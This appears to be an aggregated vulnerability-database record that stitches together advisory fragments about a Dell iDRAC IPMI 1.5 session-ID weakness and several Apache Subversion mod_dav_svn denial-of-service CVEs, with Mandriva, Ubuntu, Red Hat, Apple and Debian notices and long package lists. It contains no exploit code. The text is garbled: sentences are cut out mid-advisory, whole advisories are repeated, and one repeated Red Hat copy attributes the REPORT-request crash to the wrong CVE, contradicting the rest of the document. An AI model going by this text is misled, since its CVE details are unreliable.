The IPMI 1.5 functionality in Dell iDRAC6 modular before 3.65, iDRAC6 monolithic before 1.98, and iDRAC7 before 1.57.57 does not properly select session ID values, which makes it easier for remote attackers to execute arbitrary commands via a brute-force attack. Intelligent Platform Management Interface (IPMI) v1.5 Multiple implementations of the protocol Dell iDRAC The product contains a command injection vulnerability due to a session management issue. CWE-330: Use of Insufficiently Random Values http://cwe.mitre.org/data/definitions/330.html Sessions where random values should be used ID Is assigned regularly, so Dell iDRAC Next session used by the user logged in ID May be guessed. Also session ID Because the range of values used as is small, it is easy to guess by brute force attacks. Dell Computer Corporation, Inc. Information for VU#843044 (http://www.kb.cert.org/vuls/id/BLUU-9RDQHM) Then Dell Says: * The legacy nature of the IPMI 1.5 protocol exposes several weaknesses in * the overall design and implementation. These are: * Use of an insecure (unencrypted) channel for communication. * Poor password management including limited password length. * Limited session management capability. * These weaknesses are inherent in the overall design and implementation * of the protocol, therefore support for the IPMI 1.5 version of the protocol * has been permanently removed. This means that it will not be possible to * reactivate or enable it in an operational setting.By a remote third party, Dell iDRAC Could be hijacked to connect to and execute arbitrary commands. Multiple Dell iDRAC Products are prone to a vulnerability that lets attackers inject arbitrary commands.
Successful exploits will allow attackers to execute arbitrary commands in the context of the affected application. This may further aid in other attacks. Dell iDRAC6 modular, iDRAC6 monolithic and iDRAC7 are all system management solutions from Dell (Dell) including hardware and software. This solution provides functions such as remote management, crash recovery and power control for Dell PowerEdge systems. , which provides the ability to monitor, control, and automatically report on the health of a large number of servers. A security vulnerability exists in IPMI version 1.5 of several Dell products. The following products and versions are affected: Dell iDRAC6 modular 3.60 and earlier, iDRAC6 monolithic 1.97 and earlier, iDRAC7 1.56.55 and earlier
| VAR-201412-0515 | CVE-2014-3580 | Apache Subversion of mod_dav_svn Apache HTTPD server Service disruption in modules (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Apache subversion is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to crash the affected process, causing denial of service conditions.
Subversion versions 1.7.0 through 1.7.18 and 1.8.0 through 1.8.10 are affected. Subversion is an open source version control system of the Apache Software Foundation in the United States. The main function of the system is to be compatible with the concurrent version management system (CVS). The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFUqoNCmqjQ0CJFipgRAqwFAKCUALR1yu7OcAY6tP4LrYCdhQMJDACg7FG5
zlOOLTc8tjEXNuj5PnqflP0=
=huIz
-----END PGP SIGNATURE-----
. ============================================================================
Ubuntu Security Notice USN-2721-1
August 20, 2015
subversion vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in Subversion.
Software Description:
- subversion: Advanced version control system
Details:
It was discovered that the Subversion mod_dav_svn module incorrectly
handled REPORT requests for a resource that does not exist. This issue only affected Ubuntu 12.04 LTS and Ubuntu
14.04 LTS. This issue only affected Ubuntu
14.04 LTS. This
issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-0202)
Evgeny Kotkov discovered that the Subversion mod_dav_svn and svnserve
modules incorrectly certain crafted parameter combinations. (CVE-2015-0248)
Ivan Zhakov discovered that the Subversion mod_dav_svn module incorrectly
handled crafted v1 HTTP protocol request sequences. (CVE-2015-0251)
C. Michael Pilato discovered that the Subversion mod_dav_svn module
incorrectly restricted anonymous access. This issue only affected
Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-3184)
C. Michael Pilato discovered that Subversion incorrectly handled path-based
authorization. (CVE-2015-3187)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 15.04:
libapache2-svn 1.8.10-5ubuntu1.1
libsvn1 1.8.10-5ubuntu1.1
subversion 1.8.10-5ubuntu1.1
Ubuntu 14.04 LTS:
libapache2-svn 1.8.8-1ubuntu3.2
libsvn1 1.8.8-1ubuntu3.2
subversion 1.8.8-1ubuntu3.2
Ubuntu 12.04 LTS:
libapache2-svn 1.6.17dfsg-3ubuntu3.5
libsvn1 1.6.17dfsg-3ubuntu3.5
subversion 1.6.17dfsg-3ubuntu3.5
In general, a standard system update will make all the necessary changes. 6) - i386, noarch, x86_64
3. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: subversion security update
Advisory ID: RHSA-2015:0166-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0166.html
Issue date: 2015-02-10
CVE Names: CVE-2014-3528 CVE-2014-3580 CVE-2014-8108
=====================================================================
1. Summary:
Updated subversion packages that fix three security issues are now
available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
Subversion (SVN) is a concurrent version control system which enables one
or more users to collaborate in developing and maintaining a hierarchy of
files and directories while keeping a history of all changes. A remote, unauthenticated attacker could use a
specially crafted REPORT request to crash mod_dav_svn. (CVE-2014-3580)
A NULL pointer dereference flaw was found in the way the mod_dav_svn module
handled certain requests for URIs that trigger a lookup of a virtual
transaction name. (CVE-2014-8108)
It was discovered that Subversion clients retrieved cached authentication
credentials using the MD5 hash of the server realm string without also
checking the server's URL. A malicious server able to provide a realm that
triggers an MD5 collision could possibly use this flaw to obtain the
credentials for a different realm. (CVE-2014-3528)
Red Hat would like to thank the Subversion project for reporting
CVE-2014-3580 and CVE-2014-8108. Upstream acknowledges Evgeny Kotkov of
VisualSVN as the original reporter.
All subversion users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing the
updated packages, for the update to take effect, you must restart the httpd
daemon, if you are using mod_dav_svn, and the svnserve daemon, if you are
serving Subversion repositories via the svn:// protocol.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1125799 - CVE-2014-3528 subversion: credentials leak via MD5 collision
1174054 - CVE-2014-3580 subversion: NULL pointer dereference flaw in mod_dav_svn when handling REPORT requests
1174057 - CVE-2014-8108 subversion: NULL pointer dereference flaw in mod_dav_svn when handling URIs for virtual transaction names
6. Package List:
Red Hat Enterprise Linux Client Optional (v. 7):
Source:
subversion-1.7.14-7.el7_0.src.rpm
x86_64:
mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm
subversion-1.7.14-7.el7_0.i686.rpm
subversion-1.7.14-7.el7_0.x86_64.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-devel-1.7.14-7.el7_0.i686.rpm
subversion-devel-1.7.14-7.el7_0.x86_64.rpm
subversion-gnome-1.7.14-7.el7_0.i686.rpm
subversion-gnome-1.7.14-7.el7_0.x86_64.rpm
subversion-javahl-1.7.14-7.el7_0.i686.rpm
subversion-javahl-1.7.14-7.el7_0.x86_64.rpm
subversion-kde-1.7.14-7.el7_0.i686.rpm
subversion-kde-1.7.14-7.el7_0.x86_64.rpm
subversion-libs-1.7.14-7.el7_0.i686.rpm
subversion-libs-1.7.14-7.el7_0.x86_64.rpm
subversion-perl-1.7.14-7.el7_0.i686.rpm
subversion-perl-1.7.14-7.el7_0.x86_64.rpm
subversion-python-1.7.14-7.el7_0.x86_64.rpm
subversion-ruby-1.7.14-7.el7_0.i686.rpm
subversion-ruby-1.7.14-7.el7_0.x86_64.rpm
subversion-tools-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
Source:
subversion-1.7.14-7.el7_0.src.rpm
x86_64:
mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm
subversion-1.7.14-7.el7_0.i686.rpm
subversion-1.7.14-7.el7_0.x86_64.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-devel-1.7.14-7.el7_0.i686.rpm
subversion-devel-1.7.14-7.el7_0.x86_64.rpm
subversion-gnome-1.7.14-7.el7_0.i686.rpm
subversion-gnome-1.7.14-7.el7_0.x86_64.rpm
subversion-javahl-1.7.14-7.el7_0.i686.rpm
subversion-javahl-1.7.14-7.el7_0.x86_64.rpm
subversion-kde-1.7.14-7.el7_0.i686.rpm
subversion-kde-1.7.14-7.el7_0.x86_64.rpm
subversion-libs-1.7.14-7.el7_0.i686.rpm
subversion-libs-1.7.14-7.el7_0.x86_64.rpm
subversion-perl-1.7.14-7.el7_0.i686.rpm
subversion-perl-1.7.14-7.el7_0.x86_64.rpm
subversion-python-1.7.14-7.el7_0.x86_64.rpm
subversion-ruby-1.7.14-7.el7_0.i686.rpm
subversion-ruby-1.7.14-7.el7_0.x86_64.rpm
subversion-tools-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
subversion-1.7.14-7.el7_0.src.rpm
ppc64:
mod_dav_svn-1.7.14-7.el7_0.ppc64.rpm
subversion-1.7.14-7.el7_0.ppc64.rpm
subversion-debuginfo-1.7.14-7.el7_0.ppc.rpm
subversion-debuginfo-1.7.14-7.el7_0.ppc64.rpm
subversion-libs-1.7.14-7.el7_0.ppc.rpm
subversion-libs-1.7.14-7.el7_0.ppc64.rpm
s390x:
mod_dav_svn-1.7.14-7.el7_0.s390x.rpm
subversion-1.7.14-7.el7_0.s390x.rpm
subversion-debuginfo-1.7.14-7.el7_0.s390.rpm
subversion-debuginfo-1.7.14-7.el7_0.s390x.rpm
subversion-libs-1.7.14-7.el7_0.s390.rpm
subversion-libs-1.7.14-7.el7_0.s390x.rpm
x86_64:
mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm
subversion-1.7.14-7.el7_0.x86_64.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-libs-1.7.14-7.el7_0.i686.rpm
subversion-libs-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
subversion-1.7.14-7.el7_0.ppc.rpm
subversion-debuginfo-1.7.14-7.el7_0.ppc.rpm
subversion-debuginfo-1.7.14-7.el7_0.ppc64.rpm
subversion-devel-1.7.14-7.el7_0.ppc.rpm
subversion-devel-1.7.14-7.el7_0.ppc64.rpm
subversion-gnome-1.7.14-7.el7_0.ppc.rpm
subversion-gnome-1.7.14-7.el7_0.ppc64.rpm
subversion-javahl-1.7.14-7.el7_0.ppc.rpm
subversion-javahl-1.7.14-7.el7_0.ppc64.rpm
subversion-kde-1.7.14-7.el7_0.ppc.rpm
subversion-kde-1.7.14-7.el7_0.ppc64.rpm
subversion-perl-1.7.14-7.el7_0.ppc.rpm
subversion-perl-1.7.14-7.el7_0.ppc64.rpm
subversion-python-1.7.14-7.el7_0.ppc64.rpm
subversion-ruby-1.7.14-7.el7_0.ppc.rpm
subversion-ruby-1.7.14-7.el7_0.ppc64.rpm
subversion-tools-1.7.14-7.el7_0.ppc64.rpm
s390x:
subversion-1.7.14-7.el7_0.s390.rpm
subversion-debuginfo-1.7.14-7.el7_0.s390.rpm
subversion-debuginfo-1.7.14-7.el7_0.s390x.rpm
subversion-devel-1.7.14-7.el7_0.s390.rpm
subversion-devel-1.7.14-7.el7_0.s390x.rpm
subversion-gnome-1.7.14-7.el7_0.s390.rpm
subversion-gnome-1.7.14-7.el7_0.s390x.rpm
subversion-javahl-1.7.14-7.el7_0.s390.rpm
subversion-javahl-1.7.14-7.el7_0.s390x.rpm
subversion-kde-1.7.14-7.el7_0.s390.rpm
subversion-kde-1.7.14-7.el7_0.s390x.rpm
subversion-perl-1.7.14-7.el7_0.s390.rpm
subversion-perl-1.7.14-7.el7_0.s390x.rpm
subversion-python-1.7.14-7.el7_0.s390x.rpm
subversion-ruby-1.7.14-7.el7_0.s390.rpm
subversion-ruby-1.7.14-7.el7_0.s390x.rpm
subversion-tools-1.7.14-7.el7_0.s390x.rpm
x86_64:
subversion-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-devel-1.7.14-7.el7_0.i686.rpm
subversion-devel-1.7.14-7.el7_0.x86_64.rpm
subversion-gnome-1.7.14-7.el7_0.i686.rpm
subversion-gnome-1.7.14-7.el7_0.x86_64.rpm
subversion-javahl-1.7.14-7.el7_0.i686.rpm
subversion-javahl-1.7.14-7.el7_0.x86_64.rpm
subversion-kde-1.7.14-7.el7_0.i686.rpm
subversion-kde-1.7.14-7.el7_0.x86_64.rpm
subversion-perl-1.7.14-7.el7_0.i686.rpm
subversion-perl-1.7.14-7.el7_0.x86_64.rpm
subversion-python-1.7.14-7.el7_0.x86_64.rpm
subversion-ruby-1.7.14-7.el7_0.i686.rpm
subversion-ruby-1.7.14-7.el7_0.x86_64.rpm
subversion-tools-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
subversion-1.7.14-7.el7_0.src.rpm
x86_64:
mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm
subversion-1.7.14-7.el7_0.x86_64.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-libs-1.7.14-7.el7_0.i686.rpm
subversion-libs-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
subversion-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-devel-1.7.14-7.el7_0.i686.rpm
subversion-devel-1.7.14-7.el7_0.x86_64.rpm
subversion-gnome-1.7.14-7.el7_0.i686.rpm
subversion-gnome-1.7.14-7.el7_0.x86_64.rpm
subversion-javahl-1.7.14-7.el7_0.i686.rpm
subversion-javahl-1.7.14-7.el7_0.x86_64.rpm
subversion-kde-1.7.14-7.el7_0.i686.rpm
subversion-kde-1.7.14-7.el7_0.x86_64.rpm
subversion-perl-1.7.14-7.el7_0.i686.rpm
subversion-perl-1.7.14-7.el7_0.x86_64.rpm
subversion-python-1.7.14-7.el7_0.x86_64.rpm
subversion-ruby-1.7.14-7.el7_0.i686.rpm
subversion-ruby-1.7.14-7.el7_0.x86_64.rpm
subversion-tools-1.7.14-7.el7_0.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-3528
https://access.redhat.com/security/cve/CVE-2014-3580
https://access.redhat.com/security/cve/CVE-2014-8108
https://access.redhat.com/security/updates/classification/#moderate
https://subversion.apache.org/security/CVE-2014-3528-advisory.txt
https://subversion.apache.org/security/CVE-2014-3580-advisory.txt
https://subversion.apache.org/security/CVE-2014-8108-advisory.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFU2pCEXlSAg2UNWIIRAmlpAJ4o2MhM6glIBctGbU52rfN8EZXCDgCdEIll
KM6EsnQkXd09uLTe1k+tQaU=
=CuZg
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
These issues were addressed by updating Apache Subversion to version
1.7.19.
CVE-ID
CVE-2014-3522
CVE-2014-3528
CVE-2014-3580
CVE-2014-8108
Git
Available for: OS X Mavericks v10.9.4 or later
Impact: Synching with a malicious git repository may allow
unexpected files to be added to the .git folder
Description: The checks involved in disallowed paths did not account
for case insensitivity or unicode characters. This issue was
addressed by adding additional checks.
CVE-ID
CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of
Mercurial
Xcode 6.2 may be obtained from:
https://developer.apple.com/xcode/downloads/
To check that the Xcode has been updated:
* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "6.2".
For the stable distribution (wheezy), this problem has been fixed in
version 1.6.17dfsg-4+deb7u7.
For the unstable distribution (sid), this problem has been fixed in
version 1.8.10-5
| VAR-201412-0309 | CVE-2014-8108 | Apache Subversion of mod_dav_svn Apache HTTPD server Service disruption in modules (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.7.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a request for a URI that triggers a lookup for a virtual transaction name that does not exist. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Apache subversion is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to crash the affected process, causing denial of service conditions.
Subversion versions 1.7.0 through 1.7.18 and 1.8.0 through 1.8.10 are affected. Subversion is an open source version control system of the Apache Software Foundation in the United States. The main function of the system is to be compatible with the concurrent version management system (CVS). The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFUqoNCmqjQ0CJFipgRAqwFAKCUALR1yu7OcAY6tP4LrYCdhQMJDACg7FG5
zlOOLTc8tjEXNuj5PnqflP0=
=huIz
-----END PGP SIGNATURE-----
. ============================================================================
Ubuntu Security Notice USN-2721-1
August 20, 2015
subversion vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in Subversion.
Software Description:
- subversion: Advanced version control system
Details:
It was discovered that the Subversion mod_dav_svn module incorrectly
handled REPORT requests for a resource that does not exist. This issue only affected Ubuntu 12.04 LTS and Ubuntu
14.04 LTS. This issue only affected Ubuntu
14.04 LTS. This
issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-0202)
Evgeny Kotkov discovered that the Subversion mod_dav_svn and svnserve
modules incorrectly certain crafted parameter combinations. (CVE-2015-0248)
Ivan Zhakov discovered that the Subversion mod_dav_svn module incorrectly
handled crafted v1 HTTP protocol request sequences. (CVE-2015-0251)
C. Michael Pilato discovered that the Subversion mod_dav_svn module
incorrectly restricted anonymous access. This issue only affected
Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-3184)
C. Michael Pilato discovered that Subversion incorrectly handled path-based
authorization. (CVE-2015-3187)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 15.04:
libapache2-svn 1.8.10-5ubuntu1.1
libsvn1 1.8.10-5ubuntu1.1
subversion 1.8.10-5ubuntu1.1
Ubuntu 14.04 LTS:
libapache2-svn 1.8.8-1ubuntu3.2
libsvn1 1.8.8-1ubuntu3.2
subversion 1.8.8-1ubuntu3.2
Ubuntu 12.04 LTS:
libapache2-svn 1.6.17dfsg-3ubuntu3.5
libsvn1 1.6.17dfsg-3ubuntu3.5
subversion 1.6.17dfsg-3ubuntu3.5
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: subversion security update
Advisory ID: RHSA-2015:0166-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0166.html
Issue date: 2015-02-10
CVE Names: CVE-2014-3528 CVE-2014-3580 CVE-2014-8108
=====================================================================
1. Summary:
Updated subversion packages that fix three security issues are now
available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
Subversion (SVN) is a concurrent version control system which enables one
or more users to collaborate in developing and maintaining a hierarchy of
files and directories while keeping a history of all changes. The
mod_dav_svn module is used with the Apache HTTP Server to allow access
to Subversion repositories via HTTP. A remote, unauthenticated attacker could use a
specially crafted REPORT request to crash mod_dav_svn. (CVE-2014-8108)
It was discovered that Subversion clients retrieved cached authentication
credentials using the MD5 hash of the server realm string without also
checking the server's URL. A malicious server able to provide a realm that
triggers an MD5 collision could possibly use this flaw to obtain the
credentials for a different realm. (CVE-2014-3528)
Red Hat would like to thank the Subversion project for reporting
CVE-2014-3580 and CVE-2014-8108. Upstream acknowledges Evgeny Kotkov of
VisualSVN as the original reporter.
All subversion users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing the
updated packages, for the update to take effect, you must restart the httpd
daemon, if you are using mod_dav_svn, and the svnserve daemon, if you are
serving Subversion repositories via the svn:// protocol.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1125799 - CVE-2014-3528 subversion: credentials leak via MD5 collision
1174054 - CVE-2014-3580 subversion: NULL pointer dereference flaw in mod_dav_svn when handling REPORT requests
1174057 - CVE-2014-8108 subversion: NULL pointer dereference flaw in mod_dav_svn when handling URIs for virtual transaction names
6. Package List:
Red Hat Enterprise Linux Client Optional (v. 7):
Source:
subversion-1.7.14-7.el7_0.src.rpm
x86_64:
mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm
subversion-1.7.14-7.el7_0.i686.rpm
subversion-1.7.14-7.el7_0.x86_64.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-devel-1.7.14-7.el7_0.i686.rpm
subversion-devel-1.7.14-7.el7_0.x86_64.rpm
subversion-gnome-1.7.14-7.el7_0.i686.rpm
subversion-gnome-1.7.14-7.el7_0.x86_64.rpm
subversion-javahl-1.7.14-7.el7_0.i686.rpm
subversion-javahl-1.7.14-7.el7_0.x86_64.rpm
subversion-kde-1.7.14-7.el7_0.i686.rpm
subversion-kde-1.7.14-7.el7_0.x86_64.rpm
subversion-libs-1.7.14-7.el7_0.i686.rpm
subversion-libs-1.7.14-7.el7_0.x86_64.rpm
subversion-perl-1.7.14-7.el7_0.i686.rpm
subversion-perl-1.7.14-7.el7_0.x86_64.rpm
subversion-python-1.7.14-7.el7_0.x86_64.rpm
subversion-ruby-1.7.14-7.el7_0.i686.rpm
subversion-ruby-1.7.14-7.el7_0.x86_64.rpm
subversion-tools-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
Source:
subversion-1.7.14-7.el7_0.src.rpm
x86_64:
mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm
subversion-1.7.14-7.el7_0.i686.rpm
subversion-1.7.14-7.el7_0.x86_64.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-devel-1.7.14-7.el7_0.i686.rpm
subversion-devel-1.7.14-7.el7_0.x86_64.rpm
subversion-gnome-1.7.14-7.el7_0.i686.rpm
subversion-gnome-1.7.14-7.el7_0.x86_64.rpm
subversion-javahl-1.7.14-7.el7_0.i686.rpm
subversion-javahl-1.7.14-7.el7_0.x86_64.rpm
subversion-kde-1.7.14-7.el7_0.i686.rpm
subversion-kde-1.7.14-7.el7_0.x86_64.rpm
subversion-libs-1.7.14-7.el7_0.i686.rpm
subversion-libs-1.7.14-7.el7_0.x86_64.rpm
subversion-perl-1.7.14-7.el7_0.i686.rpm
subversion-perl-1.7.14-7.el7_0.x86_64.rpm
subversion-python-1.7.14-7.el7_0.x86_64.rpm
subversion-ruby-1.7.14-7.el7_0.i686.rpm
subversion-ruby-1.7.14-7.el7_0.x86_64.rpm
subversion-tools-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
subversion-1.7.14-7.el7_0.src.rpm
ppc64:
mod_dav_svn-1.7.14-7.el7_0.ppc64.rpm
subversion-1.7.14-7.el7_0.ppc64.rpm
subversion-debuginfo-1.7.14-7.el7_0.ppc.rpm
subversion-debuginfo-1.7.14-7.el7_0.ppc64.rpm
subversion-libs-1.7.14-7.el7_0.ppc.rpm
subversion-libs-1.7.14-7.el7_0.ppc64.rpm
s390x:
mod_dav_svn-1.7.14-7.el7_0.s390x.rpm
subversion-1.7.14-7.el7_0.s390x.rpm
subversion-debuginfo-1.7.14-7.el7_0.s390.rpm
subversion-debuginfo-1.7.14-7.el7_0.s390x.rpm
subversion-libs-1.7.14-7.el7_0.s390.rpm
subversion-libs-1.7.14-7.el7_0.s390x.rpm
x86_64:
mod_dav_svn-1.7.14-7.el7_0.x86_64.rpm
subversion-1.7.14-7.el7_0.x86_64.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-libs-1.7.14-7.el7_0.i686.rpm
subversion-libs-1.7.14-7.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
subversion-1.7.14-7.el7_0.ppc.rpm
subversion-debuginfo-1.7.14-7.el7_0.ppc.rpm
subversion-debuginfo-1.7.14-7.el7_0.ppc64.rpm
subversion-devel-1.7.14-7.el7_0.ppc.rpm
subversion-devel-1.7.14-7.el7_0.ppc64.rpm
subversion-gnome-1.7.14-7.el7_0.ppc.rpm
subversion-gnome-1.7.14-7.el7_0.ppc64.rpm
subversion-javahl-1.7.14-7.el7_0.ppc.rpm
subversion-javahl-1.7.14-7.el7_0.ppc64.rpm
subversion-kde-1.7.14-7.el7_0.ppc.rpm
subversion-kde-1.7.14-7.el7_0.ppc64.rpm
subversion-perl-1.7.14-7.el7_0.ppc.rpm
subversion-perl-1.7.14-7.el7_0.ppc64.rpm
subversion-python-1.7.14-7.el7_0.ppc64.rpm
subversion-ruby-1.7.14-7.el7_0.ppc.rpm
subversion-ruby-1.7.14-7.el7_0.ppc64.rpm
subversion-tools-1.7.14-7.el7_0.ppc64.rpm
s390x:
subversion-1.7.14-7.el7_0.s390.rpm
subversion-debuginfo-1.7.14-7.el7_0.s390.rpm
subversion-debuginfo-1.7.14-7.el7_0.s390x.rpm
subversion-devel-1.7.14-7.el7_0.s390.rpm
subversion-devel-1.7.14-7.el7_0.s390x.rpm
subversion-gnome-1.7.14-7.el7_0.s390.rpm
subversion-gnome-1.7.14-7.el7_0.s390x.rpm
subversion-javahl-1.7.14-7.el7_0.s390.rpm
subversion-javahl-1.7.14-7.el7_0.s390x.rpm
subversion-kde-1.7.14-7.el7_0.s390.rpm
subversion-kde-1.7.14-7.el7_0.s390x.rpm
subversion-perl-1.7.14-7.el7_0.s390.rpm
subversion-perl-1.7.14-7.el7_0.s390x.rpm
subversion-python-1.7.14-7.el7_0.s390x.rpm
subversion-ruby-1.7.14-7.el7_0.s390.rpm
subversion-ruby-1.7.14-7.el7_0.s390x.rpm
subversion-tools-1.7.14-7.el7_0.s390x.rpm
x86_64:
subversion-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.i686.rpm
subversion-debuginfo-1.7.14-7.el7_0.x86_64.rpm
subversion-devel-1.7.14-7.el7_0.i686.rpm
subversion-devel-1.7.14-7.el7_0.x86_64.rpm
subversion-gnome-1.7.14-7.el7_0.i686.rpm
subversion-gnome-1.7.14-7.el7_0.x86_64.rpm
subversion-javahl-1.7.14-7.el7_0.i686.rpm
subversion-javahl-1.7.14-7.el7_0.x86_64.rpm
